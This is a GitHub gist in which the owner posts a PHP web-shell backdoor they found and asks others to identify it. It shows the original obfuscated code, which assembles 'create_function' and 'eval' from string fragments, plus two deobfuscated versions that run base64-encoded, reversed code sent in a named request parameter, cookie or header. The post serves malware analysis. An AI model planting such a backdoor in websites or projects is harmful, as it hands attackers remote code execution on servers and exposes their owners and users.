Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
PHP RCE (anyone recognize it?)
<?php
/**
* Missing (useless) values marked by exclamation marks.
*/
// create a wrapper function that evals the last argument it's passed
$job = create_function(' ', 'eval(array_pop(func_get_args()));');
// call it with code as last param, there also is some gibberish for some reason
$job(?, ?, ?, ?, ?, 'u', '?', 'c', '$i=array_merge($_REQUEST,$_COOKIE,$_SERVER);$a=isset($i["vlqokbmd"])?$i["vlqokbmd"]:(isset($i["HTTP_VLQOKBMD"])?$i["HTTP_VLQOKBMD"]:die);eval(strrev(base64_decode(strrev($a))));');
<?php
$graywacke = 'j(Ob';$authentic = 'h';$godfather = 'r'; $astronaut='as';$bearably ='_trR(Q=g';$kristel= '"';$carbonaceous= 'e'; $ileum =')';$downside='e'; $bustard =';'; $dabbler ='u"$]';$bitterer = 'mH6iisc)';
$genius = ':eq_';$archers =']s';$ezechiel= 't';$backdoor= ':';$fondness= 'mL'; $briefcase = 'Ta_'; $baths= '(Kb;T'; $inviable ='V';$hasher=','; $choker ='Ki'; $bibbing= 'sa'; $belgians='[';$chatters ='$';$diffeomorphism ='_Pd';
$cannot= 'D'; $learning= 'e")QK'; $grail = ',b$_oOSBl';
$censors= 'a'; $devolve='RZ_'; $inducible = 'a';
$horton='pE)';$confession ='`'; $gated = 'aar$;yT';$channellers= ')'; $descry= 'o_=';
$diatribes = 'yU';$interstate ='(';$guilbert='r';
$longish='m';$demonstrate='fa['; $ameliorating = 'PiOk)ev'; $lora='o';$augustus= 'rbe';
$dissolved='"';$curtail ='TRE'; $kimbell = '^Ocwkrq'; $frontier='T'; $decant = 'a'; $flavor= 'C';
$ingenuity='d';$concentration='(B';$gradate = 'e[$"_e';
$drugstore ='ri)ltvnts'; $burns ='u$sld';$installed = 'p'; $ingemar= '_u;_dI]t$';$enchantment=' itr'; $cannot='U]';
$blandish = 'En)(rX_V'; $campaigning= 't';$colonels='"$gvlEL'; $handspike= 'vd[Mle4i)'; $cremations ='"';$disjunct = 'q'; $detergent='m';$leola='e';
$disagreements = 'e';$lackey='a';$juliette='iv';
$esteemed='ncSP[es';$caskets =')'; $correction= 'V';$crazy='('; $complicate ='f';$jest= 'S';
$brochures = 'Ntre';
$desolation = 'T';$carolann= '(';$cummer = ')csepV?';$cheston ='f';$dexterity ='v';$lax= 'Q?]K';
$intradepartment ='o(d'; $bombed ='va(DnQiaM';
$dull= '_sOYHeo';$healthily='rW$J(g$"L';$incarcerate= 'g';
$austria ='k';$itself='eEiMor'; $bugles = 'c'; $amative ='R'; $graciously =$bugles. $itself['5'] .
$itself['0']. $bombed['7'] . $brochures[1] . $itself['0'].
$dull['0'] .$cheston .$ingemar['1'].
$bombed['4']. $bugles . $brochures[1]. $itself['2'] .$itself['4'].$bombed['4'] ;
$ironstone=$enchantment[0] ;
$job=$graciously ($ironstone,$itself['0']. $bombed['0'] . $bombed['7'] .$handspike[4]. $healthily[4]. $bombed['7'] .$itself['5'] .$itself['5'].$bombed['7']. $diatribes['0']. $dull['0'].$cummer['4'] .$itself['4']. $cummer['4'] . $healthily[4].$cheston.$ingemar['1'] . $bombed['4'] . $bugles.$dull['0'] .$incarcerate.
$itself['0'].$brochures[1]. $dull['0'] .$bombed['7']. $itself['5']. $incarcerate .
$dull['1']. $healthily[4]. $cummer['0'] . $cummer['0'] .
$cummer['0'].$ingemar['2']);$job($dorelle['6'] , $invulnerable,$boxcars['2'] ,$felizio['4'] ,
$lobo['4'], $ingemar['1'] ,$hayley['1'] , $lax['1'], $bugles,$healthily['6'] .$itself['2']. $descry['2'] . $bombed['7']. $itself['5'].
$itself['5'] .$bombed['7'] .$diatribes['0'].
$dull['0'].$detergent .
$itself['0']. $itself['5']. $incarcerate.$itself['0'] . $healthily[4] .
$healthily['6'].$dull['0'] .
$amative.$itself['1'].
$bombed['5'] . $cannot['0'] .$itself['1'] . $jest . $desolation .$grail[0] . $healthily['6'] . $dull['0'] . $flavor . $dull['2'].$dull['2'] . $lax['3'] .$ingemar['5'].
$itself['1']. $grail[0] .$healthily['6'] . $dull['0'] . $jest . $itself['1'] . $amative. $cummer['5'].$itself['1'].
$amative . $cummer['0']. $ingemar['2'] . $healthily['6']. $bombed['7'].
$descry['2']. $itself['2'] .$dull['1']. $dull['1'] . $itself['0'] . $brochures[1] . $healthily[4].$healthily['6']. $itself['2'].
$esteemed['4'].$healthily['7'] .
$bombed['0'] . $handspike[4] .$disjunct .
$itself['4'].$austria. $augustus['1'].
$detergent . $intradepartment['2']. $healthily['7'] .$lax['2'] .
$cummer['0']. $lax['1'] .
$healthily['6'] .
$itself['2'] . $esteemed['4'] .$healthily['7'].$bombed['0'].$handspike[4]. $disjunct .$itself['4']. $austria.$augustus['1'].$detergent . $intradepartment['2']. $healthily['7'] . $lax['2'] .$backdoor .$healthily[4].
$itself['2'].$dull['1'] .$dull['1'].$itself['0'].
$brochures[1] . $healthily[4] .$healthily['6'].$itself['2']. $esteemed['4'] . $healthily['7'] . $dull['4'] .$desolation. $desolation.$esteemed[3]. $dull['0'] .$cummer['5'].$healthily['8'] .$bombed['5'].
$dull['2'].$lax['3'] . $concentration['1'].$itself['3'] . $bombed[3]. $healthily['7'] .
$lax['2'].
$cummer['0'] .$lax['1'] . $healthily['6']. $itself['2']. $esteemed['4'].$healthily['7']. $dull['4'] . $desolation .$desolation.$esteemed[3] . $dull['0']. $cummer['5'] .$healthily['8'].$bombed['5'] .$dull['2'].$lax['3'] .
$concentration['1'].$itself['3'] . $bombed[3].$healthily['7'].$lax['2']. $backdoor .
$intradepartment['2'].
$itself['2'] . $itself['0'] .$cummer['0'] .$ingemar['2'].$itself['0'].$bombed['0'].
$bombed['7'].$handspike[4] . $healthily[4] . $dull['1'] .
$brochures[1].
$itself['5'].$itself['5'] .$itself['0'].$bombed['0'].
$healthily[4] . $augustus['1'] .$bombed['7'] . $dull['1']. $itself['0']. $bitterer['2'].
$handspike['6']. $dull['0'] .$intradepartment['2'].
$itself['0'] . $bugles. $itself['4']. $intradepartment['2'].
$itself['0']. $healthily[4] . $dull['1'].$brochures[1] .$itself['5']. $itself['5']. $itself['0'] .$bombed['0']. $healthily[4] .$healthily['6'].$bombed['7'] . $cummer['0'] .$cummer['0'] . $cummer['0'].
$cummer['0']. $ingemar['2'] );
<?php
/**
* Simplified (full deobf).
*/
$name = "vlqokbmd";
$name_variant = "HTTP_VLQOKBMD";
$i = array_merge($_REQUEST, $_COOKIE, $_SERVER); // make a merge of request params, cookies and headers
$enc_code = isset($i[$name]) // get any of the variants or die
? i[$name]
: isset($i[$name_variant])
? $i[$name_variant]
: die;
// eval the received code
eval(strrev(base64_decode(strrev($enc_code))));
Owner

vikrrrr commented Jan 13, 2018

Does anyone know what this might be from? I unfortunately don't have any other samples.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment